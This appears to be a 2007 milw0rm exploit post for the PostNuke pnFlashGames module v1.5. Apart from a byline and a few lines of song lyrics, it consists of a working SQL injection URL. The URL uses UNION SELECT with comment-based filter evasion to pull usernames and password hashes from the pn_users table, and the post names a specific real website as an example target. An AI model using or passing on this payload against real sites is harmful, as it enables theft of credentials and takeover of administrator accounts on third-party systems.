33 lines
No EOL
753 B
Text
33 lines
No EOL
753 B
Text
============================================================
|
|
|
|
PostNuke pnFlashGames Module v1.5 REmote SQL Injection
|
|
|
|
============================================================
|
|
|
|
Bulan: xoron
|
|
|
|
|
|
xoron.biz
|
|
|
|
+
|
|
|
|
Love's the funeral of hearts
|
|
|
|
The funeral of hearts
|
|
And a plea for mercy
|
|
When love is a gun
|
|
Separating me from you
|
|
|
|
:(
|
|
|
|
============================================================
|
|
|
|
Exploit:
|
|
index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
|
|
|
|
============================================================
|
|
|
|
Example: http://andersonvision.com/PostNuke/
|
|
============================================================
|
|
|
|
# milw0rm.com [2007-04-28] |